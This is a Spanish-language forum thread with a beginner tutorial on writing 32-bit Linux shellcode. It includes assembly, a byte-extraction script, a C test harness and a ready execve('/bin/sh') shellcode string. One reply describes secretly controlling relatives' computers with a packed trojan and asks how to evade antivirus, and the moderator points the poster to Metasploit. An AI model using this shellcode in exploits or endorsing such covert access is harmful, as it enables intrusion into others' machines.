Underc0de

[In]Seguridad Informática => Hacking => Mensaje iniciado por: ANTRAX en Marzo 30, 2012, 12:09:20 PM

Título: Que es una Shellcode
Publicado por: ANTRAX en Marzo 30, 2012, 12:09:20 PM
En este post voy a introducir el concepto de shellcode para los que recien empiezan o capas para los que ya lo vieron pero no llegaron a entender como funciona. Usare un sistema Linux 32 bits para realizar las demostraciones.

Que significa shellcode?
Primero necesitamos saber el significado etimologico de shellcode.
Shell es como se le dice en ingles (ahora universal) a una terminal. Por lo tanto shellcode significa que es un codigo que nos crea una terminal para que la usemos.
Actualmente el termino shellcode no solo se refiere al codigo que nos permite crear una shell, sino que se extiende a codigos con mas funciones como pueden ser crear usuarios, matar/crear un determinado proceso, dar permisos a una carpeta, etc.

Y tecnicamente... una shellcode es una porcion de codigo compilada para un determinado procesador que se ejecuta dentro de otro proceso previamente preparado para que la ejecute (ej: stack overflow).

Como creamos una shellcode?
Generalmente se hacen en lenguaje ASM (assembler) para poder tener un control total del proceso ya que en C se agregan partes de codigo que no podemos controlar, ni hablar de otros lenguajes que ni siquiera pueden compilarse a codigo nativo del procesador (.NET, VB, Java, etc).
Ya sabemos que no tenemos muchos lenguajes para elegir jeje, asm de x86 (el procesador que usan las pcs) tiene dos sintaxis, la de Intel y la de AT&T, yo prefiero la segunda pero ya que la de Intel es mas popular usaremos esa.
Tambien necesitamos saber que una shellcode tiene que ser lo mas corta y portable posible, es por eso que usaremos llamadas al sistema y no llamaremos a la libc u otras librerias. La forma de llamar al sistema/kernel en *nix es mediante la interrupcion 0x80.
Tanta teoria se esta volviendo aburrida asi que vamos a los hechos, aca tenemos una shellcode bien simple que solamente cierra el programa llamando a exit(0).
Código (asm) [Seleccionar]

BITS 32
exit:
xor ebx,ebx ;ponemos 0 como argumento de exit
xor eax,eax ;limpiamos eax y ebx
mov al,0x01 ;ponemos 1 en eax (es el codigo de la syscall exit)
int 0x80 ;finalmente llamamos a la interrupcion

Ahi hicimos nuesta primer "shellcode".

Como extraemos los bytes u opcodes?
Lo que haremos ahora es compilarla y extraer los bytecodes que son los que nos interesan a nosotros, por eso abrimos nuestra terminal y tipeamos:
~$ nasm exit.asm
si queremos saber si se compilo bien podemos desensamblarlo (en 32 bits) con
~$ ndisasm-b 32 exit
y nos mostrara el desensamblado del codigo con sus respectivos opcodes:
00000000  31DB            xor ebx,ebx
00000002  31C0            xor eax,eax
00000004  B001              mov al,0x1
00000006  CD80              int 0x80
Para sacar estos opcodes podemos copiarlos uno por uno al exploit o a donde lo queramos poner; o sino extraerlos con alguna clase de script, yo me hice uno que pasa el archivo a la cadena de C directamente:
Código (python) [Seleccionar]

#!/usr/bin/python
from binascii import *
import sys

files = {}
length = []

def write(string):
sys.stdout.write(string)

def process_file(file):
source = open(file,"rb")
write("char shellcode[]=\n\t\t")
i = 1
l = 0
write("\"")
for data in source.read():
write("\\x")
write(b2a_hex(data))
if (i % 15)==0:
write("\"\n\t\t\"")
i+=1
l+=1
files[file[0:-4]]= l
write("\";\n\n")
source.close()

print("HDL Shellcode Lab - Bin to C")
if(len(sys.argv)<2):
exit(0)
process_file(sys.argv[1])

Como argumento le pasamos el archivo compilado anteriormente con nasm y nos devolvera algo asi que es una cadena en C para poner en nuestros exploits:

char shellcode[]=
"\x31\xdb\x31\xc0\xb0\x01\xcd\x80";


Como probar las shellcodes?
Para probarlas podemos usar un pequeno codigo en C que salte a la shellcode directamente, aca les dejo un codigo muy simple y funcional:

char shellcode[] = "\x31\xdb\x31\xc0\xb0\x01\xcd\x80"; //aca ponemos nuestra shellcode
int main (int argc, char *argv[])
{
  int (*run)();   //puntero a una funcion
  run = shellcode; //asignamos la direccion de la shellcode al puntero
  run();  // y la ejecutamos
}

Ahora que tenemos este codigo podemos usar cualquier debugger y poner un break en main, despues de eso ir paso por paso o sino agregamos un "int 3" al principio de la shellcode y el debugger va a saltar ahi.

Una shellcode mas compleja
Aca vamos a hacer una que nos de una shell (algo un poco mas util que salir de un programa jeje), mas especificamente una bash.
Código (asm) [Seleccionar]

BITS 32
        xor  eax,eax
        push eax
        push dword 0x68732f6e ;ponemos a /bin/sh en la pila                   
        push dword 0x69622f2f
        mov  ebx,esp    ;y le damos la direccion de /bin/sh a ebx       
xor  edx,edx
        push edx ;ponemos el resto de los argumentos en la pila 
        push ebx
        mov ecx,esp
        mov al,0x0b ;llamamos a la syscall 0x0b (execve)           
        int 0x80

Y los bytecodes de esta shellcode despues de compilarla con nasm (y extraerla con el otro script) son:

char shellcode[]=
"\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3"
"\x31\xd2\x52\x53\x89\xe1\xb0\x0b\xcd\x80";

Estos bytecodes ya estan para usarse y como veran no tiene ningun caracter nulo en su extension ;-) (sobre  bad chars (http://hdlsec.com/foro/hacking/bad-chars-y-encodersdecoders-en-payloads/) )
Fue mas que nada para perderle miedo a los terminos raros y entender mejor como estan compuestos los exploits.

Espero que les haya gustado esta pequena introduccion a shellcodes y si tienen dudas pregunten.

Saludos,

Autor: snf
Título: Re:Que es una Shellcode
Publicado por: comandosoft en Abril 30, 2012, 11:42:46 AM
Yo tengo una consulta

Tengo varios ordenadores de mis primos y familia etc. Los cuales antes controlaba con un troyano de conexion inversa "Poison ivy" lo encryptaba con themida cuando en alquellos tiempos aun valia...

Mi pregunta es si es posible crear, en vez de un  troyano, una shell remota inversa.

Pdt: ¿Las shell son detectadas por los antivirus, como los troyanos? Ya que mi idea es no perder a mis infectados. 
Título: Re:Que es una Shellcode
Publicado por: ANTRAX en Mayo 01, 2012, 07:04:46 PM
Aprende a usar el metasploit y podras hacerlo
Título: Re:Que es una Shellcode
Publicado por: baron.power en Mayo 22, 2012, 11:08:18 PM
excelente explicacion, gracias maestro, saludos
Título: Re:Que es una Shellcode
Publicado por: SOM8R4 en Mayo 23, 2012, 01:31:37 AM
Muy pero que muy interesante... pero ami eso de programar en ASM me supera. jeje todabia me falta mucho para llegar hasta estos niveles. :)
Título: Re:Que es una Shellcode
Publicado por: kid_goth en Junio 14, 2012, 03:52:07 PM
:D bueno ahora una pregunta no se si es ilogica o tota pero me llego la duda:

En caso de no tener ni idea de ASM se podria digamos obtener la shell directamente con lenguaje C y luego con un debugger (o con el mismo disasm) obtener el shellcode?

o necesariamente se debe apender ASM???
Título: Re:Que es una Shellcode
Publicado por: ANTRAX en Junio 14, 2012, 04:38:29 PM
Hay muchos codigos hechos como el del ejemplo del post. Que ya te da el codigo en ASM con la shellcode.
De todas formas, no esta de mas aprender! :D

Saludos Cordiales!

ANTRAX